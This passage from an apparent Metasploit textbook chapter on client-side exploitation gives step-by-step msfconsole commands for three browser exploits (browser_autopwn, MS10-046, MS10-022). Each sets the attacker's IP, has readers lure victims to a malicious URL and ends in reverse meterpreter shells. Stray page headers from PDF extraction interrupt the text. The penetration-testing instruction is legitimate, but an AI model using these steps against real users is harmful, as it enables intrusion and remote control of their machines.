Browser vulnerabilities have been known for a very long time. The framework and extensions are also at times the reason for exploitation. We have had recent news of the compromise of some of the latest versions of browsers such as Chromium, Internet Explorer, and Mozilla. The malicious code may exploit any form of ActiveX, Java, and Flash, which are in-built in the browser to enhance the user experience.
Victims who have been affected by such exploits may find their homepage, search page, favorites, and bookmarks changed. There may be incidents where the settings or Internet options could be altered to decrease the level of browser security, and hence make the malwares more prevalent.
Tutorial
In the tutorial section, we will show you a couple of exploits that run through the victim browser.
The first exploit that we will be showing is known as browser autopwn. First open up your terminal and launch msfconsole. Now type in use auxiliary/server/
browser autopwn.
Chapter 6
[ 121 ]
Then type in show options to see in detail all the options that we have to set in the exploit.
In the preceding figure, we can see which options are required and which are not in the Required column. A yes indicates that we have to set the option and no indicates that the option can be used with its default setting. So the first option required is LHOST. It requires the IP address for the reverse connection, so here we set the attacker's machine IP. To do so, type in set LHOST 192.168.11.23.
Client-side Exploitation
After setting the LHOST address, the next thing to set is SRVHOST. SRVHOST means the server localhost address. We set our local machine address by typing in set SRVHOST 192.168.11.23.
Now, to set the SRVPORT, which means the local port address, we type in set SRVPORT 80.
All the settings are done. Now it's time to run the auxiliary module; so type in run.
Chapter 6
[ 123 ]
After running the auxiliary module, we can see that it starts the exploit modules on the localhost. Also, it provides a malicious URL, which we have to give to the victim.
This is a simple social engineering technique in which the user is lured to click on the malicious URL.
Now, when the URL opens in the victim's system, it will send a reverse connection to the attacker's system. Let us see how this works.
Client-side Exploitation
After running the URL, we can see in msfconsole that the reverse connection has been established, and the notepad.exe process migrates to 1804.
We can see the migrated process in the victim's system via Task Manager.
Chapter 6
[ 125 ]
To check for the meterpreter session that was created, type in sessions.
Now select the meterpreter session for exploiting the victim's system. For selecting the session, the command to be used is sessions –i <Id>; for example, here we are using sessions –i 1.
After selecting a session, we instantly get the meterpreter session. We can then go for further exploits. For example, in the preceding figure, we can see the sysinfo command used for checking the system information.
Client-side Exploitation
Internet Explorer shortcut icon exploit
Another browser exploit we are going to demonstrate is of shortcut icons that contain a malicious DLL. This exploit is a social engineering attack that runs on IE 6 under Windows XP. We just need to lure our victim to click on the link to run the exploit on his system. Launch msfconsole and type in use windows/browser/
ms10_046_shortcut_icon_dllloader.
Now type in show options to see in detail all the options that we have to set in the exploit.
Chapter 6
[ 127 ]
The first option required is SRVHOST. It requires the IP address for the reverse connection, so here we set the attacker's machine IP by typing in set SRVHOST 192.168.0.109.
Now set the SRVPORT address, which means the local port address, by typing in set SRVPORT 80.
The next option is to set the URIPATH path to the default setting by typing in set URIPATH /.
Client-side Exploitation
Now all options are set and ready to run the exploit. So type in exploit.
Now it is up to you to do some clever social engineering. Give the URL to the victim and just wait for the reverse connection.
Chapter 6
[ 129 ]
Opening the URL in the browser will create a shortcut icon and a DLL file. At that time, a meterpreter session gets created in msfconsole and our victim has been compromised. Now let us check for sessions by typing in sessions.
We can see here that a session has been created. Now we select the meterpreter session for exploiting the victim's system. For selecting the session, the command to be used is sessions –i <Id>; for example, here we are using sessions –i 1.
After selecting a session, we successfully receive meterpreter; we can then go for further exploitation of the client system.
Client-side Exploitation
Internet Explorer malicious VBScript code execution exploit
We have another interesting exploit that is similar to our previous exploit and uses the same conditions and software versions. This time we are going to show you the code execution vulnerability that occurs when a victim presses the F1 button after a message box that is generated by a malicious VBScript on a web page appears.
For using this exploit, launch msfconsole and type in use exploit/windows/
browser/ms10_022_ie_vbscript_winhlp32.
Now type in show options to see all the options that have to be set in the exploit.
Chapter 6
[ 131 ]
The first option required is SRVHOST. It requires the IP address for the reverse connection, so we set the attacker's machine IP. For example, here we type in set SRVHOST 192.168.0.105.
Now we set the SRVPORT number by typing in set SRVPORT 80.
The next option is to set the URIPATH path to the default setting by typing in set URIPATH /.
Client-side Exploitation
Now all the options are set and ready to run the exploit, so type in exploit.
Next, we just need to use some of our social engineering skills to make our victim click on the URL. We give the URL to our victim and make him click on it. After opening the URL in Internet Explorer, it pops up a message box showing a message, Welcome! Press F1 to dismiss this dialog.
Chapter 6
[ 133 ]
After F1 is pressed, the malicious VBScript will run in the browser and send a payload named calc.exe.
After executing the .exe file, it will make a reverse connection to the attacker machine and create a meterpreter session. Type in sessions for checking the available sessions.
Client-side Exploitation
We can see here that a session has been created. Now select the meterpreter session for exploiting the victim's system. For selecting the session, we use the command sessions –i <Id>; for example, here we are using sessions –i 1.
After selecting a session, we successfully receive meterpreter; we can then go for further exploitation of the victim machine.
Summary
In this chapter we successfully demonstrated some of the niche client-side exploits.
These exploits were specifically targeted at the client systems through the browser or a malicious link, and some social engineering tricks. A golden rule in the security book is never to click on unknown links, and in our case we were able to get through the defenses of our victim. This is the best part of Metasploit—the arrays of attack vectors are so large that if something does not work, another will for sure. So it is a recommendation to all to avoid clicking on links, running unknown executable files, and responding to e-mails from malicious people. The next chapter will deal with some of the techniques on post-exploitation, so stay tuned; we still have a lot of exploit tricks to be learned.
References
The following are some helpful references that shed further light on some of the topics covered in this chapter:
• http://blog.botrevolt.com/what-are-client-side-attacks/
• http://en.wikipedia.org/wiki/Browser_exploit
• http://www.securitytube.net/video/2697